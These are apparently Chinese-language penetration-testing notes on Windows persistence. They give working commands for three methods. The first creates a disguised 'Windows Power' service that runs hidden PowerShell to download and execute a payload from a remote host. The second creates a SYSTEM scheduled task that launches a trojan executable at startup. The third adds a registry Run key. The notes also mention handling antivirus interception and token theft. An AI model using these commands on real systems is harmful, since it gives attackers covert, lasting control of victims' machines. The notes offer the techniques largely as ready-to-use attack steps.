1.服务自启动 powershell有可能被防火墙拦截
sc create“Windows Power”binpath=“cmd /c start powershell.exe -nop -w hidden -c \”
IEX((new-object net.webclient).downloadstring('http://192.168.0.150:80/a'))\""
这边做一个启动
此时进行了拦截
再来重新做一下,并且把会话sleep调试为0
杀毒软件此时跳出来的话,此时程序阻止暂时不处理
sc config "Windows Power"start=auto 让系统启动的时候此sc服务就启动
sc description "Windows Power" "windows auto service"
net start "Windows Power"
允许运行
这个时候就多出了一台会话
sc delete "Windows Power"
演示:
木马文件
sc create “server power” binpath=“C:\User\Administrator\Desktop\artifact.exe”
sc description “server power” “description”设置服务的描述字符串
sc config “server power” start=auto 设置这个服务为自动启动
net star“server power” 启动服务
2.计划任务
创建任务
schtasks/create/tn “windowsup”/tr“C:\artifact.exe”/ru SYSTEM /sc onstart
删除任务
schtasks /delete /tn windowsup
查询任务
schtasks /query /tn windowsup
chcp 437 无法载入列表 请修改字符集
手工运行任务
schtasks /run /tn test3
因为是系统权限,可以看进程任务
可以 Token令牌窃取
3.注册表启动
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v “Keyname”
/t REG_SZ /d "/C:\artifact.exe"/f
然后重启机子,这边的话就会自动开启之前设置的会话服务